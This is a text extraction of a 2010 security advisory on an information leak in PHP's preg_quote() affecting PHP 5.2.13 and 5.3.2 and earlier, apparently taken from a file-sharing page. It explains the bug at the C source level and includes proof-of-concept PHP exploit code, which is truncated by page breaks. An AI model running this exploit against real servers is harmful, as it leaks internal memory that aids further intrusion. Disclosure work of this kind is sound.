PHP preg_quote() Interruption Information Leak Vulnerability.pdf

(64 KB) Pobierz

ﬁle:///tmp/17.html

MOPS-2010-017: PHP preg_quote() Interruption Information

Leak Vulnerability

May 9th, 2010

PHP’s preg_quote() function can be abused for information leak attacks, because of the call time pass

by reference feature.

Affected versions

Affected is PHP 5.2 <= 5.2.13

Affected is PHP 5.3 <= 5.3.2

Credits

The vulnerability was discovered by Stefan Esser during a search for interruption vulnerability

examples.

Detailed information

This vulnerability is one of the interruption vulnerabilities discussed in Stefan Esser’s talk about

interruption vulnerabilities at BlackHat USA 2009 (SLIDES,PAPER). The basic ideas of these

exploits is to use a user space interruption of an internal function to destroy the arguments used by the

internal function in order to cause information leaks or memory corruptions. Some of these

vulnerabilties are only exploitable because of the call time pass by reference feature in PHP.

After the talk the PHP developers tried to remove the offending call time pass by reference feature but

failed. The feature was only partially removed which means several exploits developed last year still

worked the same after the ﬁxes or just had to be slightly rewritten. One of these exploits exploits the

preg_quote() function.

1 of 4

5/10/10 6:58 PM

ﬁle:///tmp/17.html

static PHP_FUNCTION(preg_quote)

{

...

/* Get the arguments and check for errors */

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|s", &in_str, &in_str_len,

&delim, &delim_len) == FAILURE) {

return;

}

in_str_end = in_str + in_str_len;

...

if (delim && *delim) {

delim_char = delim[0];

quote_delim = 1;

}

/* Allocate enough memory so that even if each character

is quoted, we won't run out of room */

out_str = safe_emalloc(4, in_str_len, 1);

/* Go through the string and quote necessary characters */

for(p = in_str, q = out_str; p != in_str_end; p++) {

c = *p;

switch(c) {

case '.':

...

case '-':

*q++ = '\';

*q++ = c;

break;

The problem here is that zend_parse_parameters() retrieves the two arguments into local variables.

The string pointers and lengths are therfore copied into local variables, loosing the connection to the

original ZVAL. The problem is that string data is not inbound and any modiﬁcation of the ZVALs will

not be reﬂected in the local variables and therefore any interruption could just modify the ZVALs so

that the local variables point to already freed and reused memory. And because

zend_parse_parameters() supports the __toString() method of objects the argument parsing can be

easily interrupted by just passing an object as third parameter to preg_quote(). From the __toString()

method an attacker can then kill the ﬁrst argument to preg_quote() due to the call time pass by

reference feature of PHP and reuse it e.g. for a hashtable. This results in preg_quote() working on

memory of a hashtable instead of a string, which lets the attacker leak important internal memory

offsets.

Proof of concept, exploit or instructions to reproduce

2 of 4

5/10/10 6:58 PM

ﬁle:///tmp/17.html

The following proof of concept code will trigger the vulnerability and leak a PHP hashtable. The

hexdump of a hashtable looks like this.

Hexdump

-------

00000000: 08 00 00 00 07 00 00 00 01 00 00 00 41 41 41 41 ............AAAA

00000010: 00 00 00 00 00 00 00 00 F0 F2 B4 00 01 00 00 00 ................

00000020: F0 F2 B4 00 01 00 00 00 F0 F2 B4 00 01 00 00 00 ................

00000030: D0 0A B5 00 01 00 00 00 74 43 30 00 01 00 00 00 ........tC0.....

00000040: 00 00 01 -- -- -- -- -- -- -- -- -- -- -- -- -- ...

The following code tries to detect if it is running on a 32 bit or 64 bit system and adjust accordingly.

Note that the method used here does not work on 64 bit Windows.

<?php

class dummy

{

function __toString()

{

/* now the magic */

parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);

return "";

}

/* Detect 32 vs 64 bit */

$i = 0x7fffffff;

$i++;

if (is_ﬂoat($i)) {

$GLOBALS['var'] = str_repeat("A", 39);

} else {

$GLOBALS['var'] = str_repeat("A", 67);

}

/* Trigger the Code */

$x = stripcslashes(preg_quote(&$GLOBALS['var'], new dummy()));

hexdump($x);

/* Helper function */

function hexdump($x)

{

$l = strlen($x);

$p = 0;

echo "Hexdump\n";

echo "-------\n";

3 of 4

5/10/10 6:58 PM

ﬁle:///tmp/17.html

Notes

We strongly recommend to ﬁx this vulnerability by removing the call time pass by reference feature

for internal functions correctly this time.

4 of 4

5/10/10 6:58 PM

Plik z chomika:

musli_com

Inne pliki z tego folderu:

The Hackademy Prog - Apprendre A Programmer En PHP.pdf (34947 KB)
Apress.Professional.PHP4.PROPER.eBook-LiB.chm (12608 KB)
John.Wiley.and.Sons.PHP5.and.MySQL.Bible.Apr.2004.eBook-DDU.pdf (16849 KB)
Manuel PHP FR.pdf (11855 KB)
Développer une application avec PHP et MySQL.pdf (4444 KB)

PHP preg_quote() Interruption Information Leak Vulnerability.pdf

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: